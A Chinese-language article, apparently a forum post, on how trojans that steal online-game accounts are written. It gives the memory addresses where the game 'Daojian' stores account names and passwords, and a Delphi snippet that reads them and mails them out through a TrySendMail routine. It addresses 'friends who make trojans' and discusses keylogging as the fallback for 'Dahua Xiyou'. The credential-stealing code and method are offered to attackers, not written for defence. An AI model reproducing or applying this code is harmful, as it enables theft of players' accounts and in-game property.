传奇、奇迹、大话西游等等网络游戏,害人不浅,掏尽了许多玩家的口袋,让无数个成年或者未成年的人们坠入其中而不能自拔,而随之而来的盗游戏帐号以及装备更让许多玩家“痛不欲生”,籍此,本人粗谈一下网游木马是如何写的,如有不妥之处,还望大家海涵。
从大体上看,写木马盗网游帐号及密码的程序无非是抓取内存地址或者截取键盘录入的方式,而用的最多的便是抓内存地址的方式了。搜狐最新推出了一款游戏“刀剑”,下载后研究了一下,发现其研发人员并没有充分的考虑游戏帐号的安全性等,输入帐号和密码以及登陆之后在游戏不退出的情况下,帐号和密码的内存地址一次不清空并一直保存着帐号和密码,这样给做刀剑木马的朋友们提供了很大的帮助,也许这也算是一个BUG吧,以后刀剑的研发人员可能去处理的。所以几行很简单的代码就能将帐号和密码取出来:
UserName:=Trim(GetMem('03FB2088',16)); //“刀剑”的帐号存在的内存地址
Password:=Trim(GetMem('03FB20B8',16)); //“刀剑”的密码存在的内存地址
if (Length(UserName)>3) And (Length(Password)>3) then
begin
if (Length(UserName)=Length(OldUserName)) and (Length(Password)=Length(OldPassword)) then
begin
TrySendMail;
if IsTrue then exit;
IsTrue:=True;
end;
OldUserName:=UserName;
OldPassword:=Password;
UserName:='';
Password:='';
end;
顺便看了一下“大话西游”,因为现在网上“大话西游”的木马很少见的,在测试中发现,“大话西游”每运行一次,帐号和密码的内存地址就会变一次,这样,做木马的朋友就不可能通过抓内存地址的方法来获得“大话西游”的帐号和密码了,也许在迫不得已的情况下,有的人会用截取键盘录入的方法来截取了。
现在网上最多的莫过于传奇的木马了,而几乎所有的传奇木马都是靠抓取内存地址来获得角色和装备的。
如果有问题请登陆作者的网站:http://webnetnmg.myrice.com。